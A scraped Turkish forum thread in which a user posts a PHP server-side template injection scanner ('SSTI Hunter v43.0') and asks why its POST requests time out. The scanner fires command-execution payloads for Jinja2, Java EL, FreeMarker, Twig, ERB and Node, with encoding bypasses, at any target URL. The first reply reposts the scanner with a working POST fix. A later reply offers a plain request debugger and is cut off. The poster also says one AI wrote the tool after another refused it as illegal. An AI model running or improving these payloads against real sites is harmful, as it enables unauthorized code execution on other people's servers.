<?php
/**
* SSTI Hunter v43.0 - pwdec "THE ABSOLUTE OVERLORD: FINAL SINGULARITY"
* Mimari: Multi-Method Atomic Scan & Full Context Bypass
* Platform: cPanel, XAMPP, Localhost Optimized
*/
ini_set('display_errors', '1');
error_reporting(E_ALL);
if (!extension_loaded('curl')) die("CRITICAL: CURL is missing!");
set_time_limit(0);
ini_set('memory_limit', '2G');
class FinalSingularity {
public static function getDatabase($w = "") {
$w = rtrim($w, '/');
// Tüm mermiler burada, hiçbirini silmedim.
return [
"Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'],
"Python (Jinja2/Mako/Django)" => [
'{{' . 'config.items()}}', '{{' . 'self.__dict__}}',
'{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}',
'${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}'
],
"Java (EL/FreeMarker/Velocity)" => [
'${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}',
'${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}',
'<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}',
'#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))'
],
"PHP (Twig/Smarty/Blade)" => [
'{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}',
'{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
'{' . 'smarty.template_vars}'
],
"Ruby & JS (ERB/EJS/Slim)" => [
'<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>',
'{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}'
],
"Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}']
];
}
public static function applyMatrix($p, $opts) {
$m = ['Raw' => $p];
if (in_array('url', $opts)) $m['URL'] = urlencode($p);
if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p));
if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . dechex(ord($p[$i])); $m['Hex'] = $h; }
if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; }
if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); }
if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; }
return $m;
}
}
$results = [];
$stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) {
$target = $_POST['url'];
$params = array_filter(array_map('trim', explode(',', $_POST['params'])));
$webhook = $_POST['webhook'] ?? "";
$opts = $_POST['opts'] ?? ['url'];
$method = $_POST['method'];
$cookies = $_POST['cookies'] ?? "";
$headers = array_filter(array_map('trim', explode("\n", $_POST['headers'])));
$only_vuln = isset($_POST['only_vuln']);
$db = FinalSingularity::getDatabase($webhook);
foreach ($params as $pr) {
foreach ($db as $cat => $list) {
foreach ($list as $raw) {
$vars = FinalSingularity::applyMatrix($raw, $opts);
foreach ($vars as $mode => $final) {
$stats['total']++;
$ch = curl_init();
$payload_data = ["$pr" => $final];
$url = $target;
if ($method === 'GET') {
$url .= (strpos($url, '?') ? '&' : '?') . http_build_query($payload_data);
} else {
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload_data));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
$curl_configs = [
CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_HEADER => 1, CURLOPT_COOKIE => $cookies
];
if ($headers) $curl_configs[CURLOPT_HTTPHEADER] = array_merge($curl_configs[CURLOPT_HTTPHEADER] ?? [], $headers);
curl_setopt_array($ch, $curl_configs);
$resp = (string)curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
$body = substr($resp, $info['header_size']);
$v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body);
if ($v) $stats['vuln']++;
if (!$only_vuln || $v) {
$results[] = [
'p' => $pr, 'cat' => $cat, 'm' => $mode, 'pld' => $final,
'st' => $info['http_code'], 'len' => strlen($body), 'v' => $v, 'u' => ($method === 'GET' ? $url : $target)
];
}
if ($info['http_code'] == 500) usleep(250000);
gc_collect_cycles();
}
}
}
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>SSTI Sovereign Final v43.0</title>
<style>
:root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; }
body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; }
.box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); }
h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; }
input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; }
input:focus { border-color: var(--blue); }
.checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); }
.btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; }
.btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); }
.stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; }
.stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); }
table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; }
th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; }
td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; }
.v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; }
.action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; }
</style>
</head>
<body>
<div class="box">
<h1>>> pwdec_SSTI_SOVEREIGN_v43.0</h1>
<form method="POST">
<div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;">
<div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Params</label><input type="text" name="params" value="id,template,q" required></div>
<div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div>
</div>
</div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div>
<div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div>
</div>
<div class="checks">
<label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label>
<label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label>
<label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label>
<label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label>
<label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label>
<label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label>
</div>
<button type="submit" name="launch" class="btn">Execute Absolute Final Strike</button>
</form>
</div>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<div class="stats-bar">
<div class="stat-item"><span class="stat-val"><?= $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div>
<div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div>
<div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div>
<div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div>
</div>
<div class="box">
<table>
<thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead>
<tbody>
<?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?>
<?php foreach($results as $r): ?>
<tr class="<?= $r['v'] ? 'v-row' : '' ?>">
<td><?= htmlspecialchars($r['p']) ?></td><td><?= $r['cat'] ?></td><td><?= $r['m'] ?></td>
<td><?= $r['st'] ?></td><td><?= $r['len'] ?> B</td>
<td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= htmlspecialchars($r['pld']) ?></td>
<td>
<button class="action-btn" onclick="navigator.clipboard.writeText('<?= addslashes($r['pld']) ?>'); alert('Kopyalandı!')">COPY</button>
<a href="<?= $r['u'] ?>" target="_blank" class="action-btn">GO</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>
</body>
</html> PHP Post Method Hk Sorum
4
●146
- 07-04-2026, 22:34:14Şöyle bir scriptim var arkadaşlar. Şimdi mantık şu bir input alanı var ve benim verdiğim listedekileri deniyor ve bana sonuclar cıkartıyor. bu GET isteği olanlarda sorun yok ama POST isteği olanlarda timeout hatası alıyorum. v47 yaptı gemini. hala calismiyor chatgpt de illegal diyor.
- 07-04-2026, 22:40:16
<?php ini_set('display_errors', '1'); error_reporting(E_ALL); if (!extension_loaded('curl')) die("CRITICAL: CURL is missing!"); set_time_limit(0); ini_set('memory_limit', '2G'); class FinalSingularity { public static function getDatabase($w = "") { $w = rtrim($w, '/'); return [ "Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'], "Python (Jinja2/Mako/Django)" => [ '{{' . 'config.items()}}', '{{' . 'self.__dict__}}', '{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}', '${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}' ], "Java (EL/FreeMarker/Velocity)" => [ '${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}', '${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}', '<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}', '#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))' ], "PHP (Twig/Smarty/Blade)" => [ '{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}', '{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}', '{' . 'smarty.template_vars}' ], "Ruby & JS (ERB/EJS/Slim)" => [ '<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>', '{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}' ], "Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}'] ]; } public static function applyMatrix($p, $opts) { $m = ['Raw' => $p]; if (in_array('url', $opts)) $m['URL'] = urlencode($p); if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p)); if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . dechex(ord($p[$i])); $m['Hex'] = $h; } if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; } if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); } if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; } return $m; } } $results = []; $stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)]; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) { $target = $_POST['url']; $params = array_filter(array_map('trim', explode(',', $_POST['params']))); $webhook = $_POST['webhook'] ?? ""; $opts = $_POST['opts'] ?? ['url']; $method = $_POST['method']; $cookies = $_POST['cookies'] ?? ""; $headers = array_filter(array_map('trim', explode("\n", $_POST['headers']))); $only_vuln = isset($_POST['only_vuln']); $db = FinalSingularity::getDatabase($webhook); foreach ($params as $pr) { foreach ($db as $cat => $list) { foreach ($list as $raw) { $vars = FinalSingularity::applyMatrix($raw, $opts); foreach ($vars as $mode => $final) { $stats['total']++; $ch = curl_init(); $payload_data = ["$pr" => $final]; $url = $target; // ============ CURL BAŞLANGIÇ ============ // Header setup - TEK BİR SEFER $http_headers = ['Content-Type: application/x-www-form-urlencoded']; if (!empty($headers)) { $http_headers = array_merge($http_headers, $headers); } // URL setup if ($method === 'GET') { $url .= (strpos($url, '?') ? '&' : '?') . http_build_query($payload_data); } // CURL OPTIONS - HEPSİ BİRLİKTE $curl_opts = [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 8, CURLOPT_CONNECTTIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_HEADER => 1, CURLOPT_COOKIE => $cookies, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_MAXREDIRS => 2, CURLOPT_NOSIGNAL => 1, CURLOPT_HTTPHEADER => $http_headers, CURLOPT_FAILONERROR => 0, CURLOPT_ENCODING => '', ]; // POST/PUT datası if ($method !== 'GET') { $post_fields = http_build_query($payload_data); $curl_opts[CURLOPT_POSTFIELDS] = $post_fields; if ($method === 'POST') { $curl_opts[CURLOPT_POST] = 1; } else { $curl_opts[CURLOPT_CUSTOMREQUEST] = $method; } } // Tüm curl ayarlarını bir kez set et curl_setopt_array($ch, $curl_opts); // İsteği yap $resp = @curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); // Timeout veya hata varsa atla if ($resp === false) { continue; } // Response parse $body = substr($resp, $info['header_size']); $v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body); if ($v) $stats['vuln']++; // Sonuçları kaydet if (!$only_vuln || $v) { $results[] = [ 'p' => $pr, 'cat' => $cat, 'm' => $mode, 'pld' => $final, 'st' => $info['http_code'] ?? 0, 'len' => strlen($body), 'v' => $v, 'u' => ($method === 'GET' ? $url : $target) ]; } // Memory temizle gc_collect_cycles(); } } } } } ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <title>SSTI Sovereign Final v43.0</title> <style> :root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; } body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; } .box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); } h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; } input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; } input:focus { border-color: var(--blue); } .checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); } .btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; } .btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); } .stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; } .stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; } .stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); } table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; } th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; } td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; } .v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; } .action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; } </style> </head> <body> <div class="box"> <h1>>> SSTI_HUNTER_FINAL_FIXED_v43</h1> <form method="POST"> <div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;"> <div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div> <div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;"> <div><label>Params</label><input type="text" name="params" value="id,template,q" required></div> <div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div> </div> </div> <div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;"> <div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div> <div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div> </div> <div class="checks"> <label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label> <label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label> <label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label> <label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label> <label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label> <label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label> </div> <button type="submit" name="launch" class="btn">Execute Final Strike</button> </form> </div> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?> <div class="stats-bar"> <div class="stat-item"><span class="stat-val"><?= $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div> <div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div> <div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div> <div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div> </div> <div class="box"> <table> <thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead> <tbody> <?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?> <?php foreach($results as $r): ?> <tr class="<?= $r['v'] ? 'v-row' : '' ?>"> <td><?= htmlspecialchars($r['p']) ?></td><td><?= $r['cat'] ?></td><td><?= $r['m'] ?></td> <td><?= $r['st'] ?></td><td><?= $r['len'] ?> B</td> <td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= htmlspecialchars($r['pld']) ?></td> <td> <button class="action-btn" onclick="navigator.clipboard.writeText('<?= addslashes($r['pld']) ?>'); alert('Kopyalandı!')">COPY</button> <a href="<?= $r['u'] ?>" target="_blank" class="action-btn">GO</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <?php endif; ?> </body> </html> - 07-04-2026, 22:49:36<?php
ini_set('display_errors', '1');
error_reporting(E_ALL);
if (!extension_loaded('curl')) {
die('CRITICAL: CURL is missing!');
}
set_time_limit(0);
function h($value): string
{
return htmlspecialchars((string)$value, ENT_QUOTES, 'UTF-8');
}
function parseHeaderLines(string $raw): array
{
$lines = preg_split('/rn|r|n/', $raw);
$headers = [];
foreach ($lines as $line) {
$line = trim($line);
if ($line === '') { continue;
}
if (strpos($line, ':') === false) {
continue;
}
$headers[] = $line;
}
return $headers;
}
function parseFormLines(string $raw): array
{
$lines = preg_split('/rn|r|n/', $raw);
$data = [];
foreach ($lines as $line) {
$line = trim($line);
if ($line === '') {
continue;
}
$parts = explode('=', $line, 2);
$key = trim($parts[0]);
$value = isset($parts[1]) ? trim($parts[1]) : '';
if ($key !== '') {
$data[$key] = $value;
}
}
return $data;
}
function hasHeader(array $headers, string $needle): bool
{
foreach ($headers as $header) {
if (stripos($header, $needle . ':') === 0) {
return true;
}
}
return false;
}
function sendRequest(array $input): array
{
$url = trim($input['url'] ?? '');
$method = strtoupper(trim($input['method'] ?? 'GET'));
$params = parseFormLines((string)($input['params'] ?? ''));
$rawBody = (string)($input['raw_body'] ?? '');
$cookies = trim((string)($input['cookies'] ?? ''));
$headers = parseHeaderLines((string)($input['headers'] ?? ''));
$connectTimeout = max(1, (int)($input['connect_timeout'] ?? 10));
$timeout = max($connectTimeout, (int)($input['timeout'] ?? 30)); $verifySsl = !empty($input['verify_ssl']);
if ($url === '') {
throw new InvalidArgumentException('URL gerekli.');
}
if (session_status() === PHP_SESSION_ACTIVE) {
session_write_close();
}
$bodyString = '';
$requestUrl = $url;
if ($method === 'GET') {
if (!empty($params)) {
$query = http_build_query($params);
$requestUrl .= (strpos($requestUrl, '?') !== false ? '&' : '?') . $query;
}
} else {
if ($rawBody !== '') {
$bodyString = $rawBody;
} elseif (!empty($params)) {
$bodyString = http_build_query($params);
if (!hasHeader($headers, 'Content-Type')) {
$headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
}
}
}
// POST/PUT/PATCH/DELETE tarafında bazı sunucularda 100-continue takılmasını engeller
if (!hasHeader($headers, 'Expect')) {
$headers[] = 'Expect:';
}
if (!hasHeader($headers, 'Connection')) {
$headers[] = 'Connection: close';
}
if (!hasHeader($headers, 'User-Agent')) {
$headers[] = 'User-Agent: PHP Request Debugger/1.0';
}
if ($bodyString !== '' && !hasHeader($headers, 'Content-Length')) {
$headers[] = 'Content-Length: ' . strlen($bodyString);
}
$ch = curl_init();
$options = [
CURLOPT_URL => $requestUrl,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 5,
CURLOPT_CONNECTTIMEOUT => $connectTimeout,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_ENCODING => '',
CURLOPT_NOSIGNAL => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_SSL_VERIFYPEER => $verifySsl,
CURLOPT_SSL_VERIFYHOST => $verifySsl ? 2 : 0,
CURLOPT_COOKIE => $cookies,
CURLOPT_HTTPHEADER => $headers, ];
switch ($method) {
case 'GET':
$options[CURLOPT_HTTPGET] = true;
break;
case 'POST':
$options[CURLOPT_POST] = true;
$options[CURLOPT_POSTFIELDS] = $bodyString;
break;
case 'HEAD':
$options[CURLOPT_NOBODY] = true;
$options[CURLOPT_CUSTOMREQUEST] = 'HEAD';
break;
default:
$options[CURLOPT_CUSTOMREQUEST] = $method;
$options[CURLOPT_POSTFIELDS] = $bodyString;
break;
}
curl_setopt_array($ch, $options);
$rawResponse = curl_exec($ch);
$errno = curl_errno($ch);
$error = curl_error($ch);
$info = curl_getinfo($ch);
if ($rawResponse === false) {
$rawResponse = '';
}
$headerSize = $info['header_size'] ?? 0; $responseHeaders = substr($rawResponse, 0, $headerSize);
$responseBody = substr($rawResponse, $headerSize);
curl_close($ch);
return [
'request_url' => $requestUrl,
'method' => $method,
'request_headers' => $headers,
'request_body' => $bodyString,
'errno' => $errno,
'error' => $error,
'info' => $info,
'response_headers' => $responseHeaders,
'response_body' => $responseBody,
];
}
$result = null;
$exceptionMessage = null;
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
try {
$result = sendRequest($_POST);
} catch (Throwable $e) {
$exceptionMessage = $e->getMessage();
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>PHP Request Debugger</title>
<style>
:root {
--bg: #0d1117;
--card: #161b22;
--border: #30363d;
--blue: #58a6ff;
--green: #2ea043;
--red: #f85149;
--text: #c9d1d9;
--muted: #8b949e;
}
* { box-sizing: border-box; }
body {
margin: 0;
padding: 24px;
background: var(--bg);
color: var(--text);
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", sans-serif;
}
.box {
background: var(--card);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin-bottom: 18px;
}
h1, h2 {
margin-top: 0;
color: var(--blue);
}
.grid {
display: grid;
gap: 14px;
}
.grid-2 {
grid-template-columns: 2fr 1fr;
}
.grid-3 {
grid-template-columns: repeat(3, 1fr);
}
label {
display: block;
margin-bottom: 6px;
font-size: 13px;
color: var(--muted);
}
input, select, textarea, button {
width: 100%;
border-radius: 8px;
border: 1px solid var(--border);
background: #0d1117;
color: #fff;
padding: 12px;
font-size: 14px;
}
textarea {
min-height: 140px;
resize: vertical;
font-family: Consolas, monospace;
}
button {
background: var(--green);
border: none;
font-weight: 700;
cursor: pointer;
}
pre {
white-space: pre-wrap;
word-break: break-word;
background: #0b0f14;
border: 1px solid var(--border);
padding: 14px;
border-radius: 8px;
overflow: auto; }
.meta {
display: grid;
grid-template-columns: repeat(4, 1fr);
gap: 12px;
}
.meta .item {
background: #0b0f14;
border: 1px solid var(--border);
border-radius: 8px;
padding: 12px;
}
.k {
color: var(--muted);
font-size: 12px;
display: block;
margin-bottom: 4px;
}
.v {
font-weight: 700;
}
.error {
color: #fff;
background: rgba(248, 81, 73, 0.15);
border: 1px solid rgba(248, 81, 73, 0.4);
padding: 12px;
border-radius: 8px;
}
.ok {
color: #fff;
background: rgba(46, 160, 67, 0.15);
border: 1px solid rgba(46, 160, 67, 0.4);
padding: 12px;
border-radius: 8px;
}
</style>
</head> <body>
<div class="box">
<h1>PHP Request Debugger</h1>
<form method="POST">
<div class="grid grid-2">
<div>
<label>URL</label>
<input
type="text"
name="url"
value="<?= h($_POST['url'] ?? '') ?>"
placeholder="https://example.com/api/test"
required
>
</div>
<div>
<label>Method</label>
<select name="method">
<?php
$methods = ['GET', 'POST', 'PUT', 'PATCH', 'DELETE', 'HEAD'];
$currentMethod = strtoupper($_POST['method'] ?? 'GET');
foreach ($methods as $m) {
$sel = $currentMethod === $m ? 'selected' : '';
echo '<option ' . $sel . '>' . h($m) . '</option>';
}
?>
</select>
</div>
</div>
<div class="grid grid-3" style="margin-top:14px;">
<div>
<label>Connect Timeout (sn)</label>
<input type="number" name="connect_timeout" value="<?= h($_POST['connect_timeout'] ?? '10') ?>" min="1">
</div>
<div>
<label>Total Timeout (sn)</label>
<input type="number" name="timeout" value="<?= h($_POST['timeout'] ?? '30') ?>" min="1">
</div>
<div>
<label>Cookies</label>
<input type="text" name="cookies" value="<?= h($_POST['cookies'] ?? '') ?>" placeholder="session=abc123; foo=bar">
</div>
</div>
<div class="grid grid-2" style="margin-top:14px;">
<div>
<label>Form Params (satır başına key=value)</label>
<textarea name="params" placeholder="name=ali email=ali@example.com"><?= h($_POST['params'] ?? '') ?></textarea>
</div>
<div>
<label>Raw Body</label>
<textarea name="raw_body" placeholder='{"name":"ali"}'><?= h($_POST['raw_body'] ?? '') ?></textarea>
</div>
</div>
<div style="margin-top:14px;">
<label>Headers (satır başına Header: value)</label>
<textarea name="headers" placeholder="Accept: application/json X-Test: 1"><?= h($_POST['headers'] ?? '') ?></textarea>
</div>
<div style="margin-top:14px; margin-bottom:14px;">
<label>
<input type="checkbox" name="verify_ssl" value="1" <?= !empty($_POST['verify_ssl']) ? 'checked' : '' ?> style="width:auto; margin-right:8px;">
SSL doğrulaması açık
</label>
</div>
<button type="submit">İsteği Gönder</button>
</form>
</div>
<?php if ($exceptionMessage !== null): ?>
<div class="box">
<div class="error"><?= h($exceptionMessage) ?></div>
</div>
<?php endif; ?>
<?php if ($result !== null): ?>
<div class="box">
<h2>Özet</h2>
<?php if ($result['errno'] !== 0): ?>
<div class="error">
<strong>cURL Error #<?= h($result['errno']) ?>:</strong>
<?= h($result['error']) ?>
</div>
<?php else: ?>
<div class="ok">İstek tamamlandı.</div>
<?php endif; ?>
<div class="meta" style="margin-top:14px;">
<div class="item">
<span class="k">HTTP Code</span>
<span class="v"><?= h($result['info']['http_code'] ?? 0) ?></span>
</div>
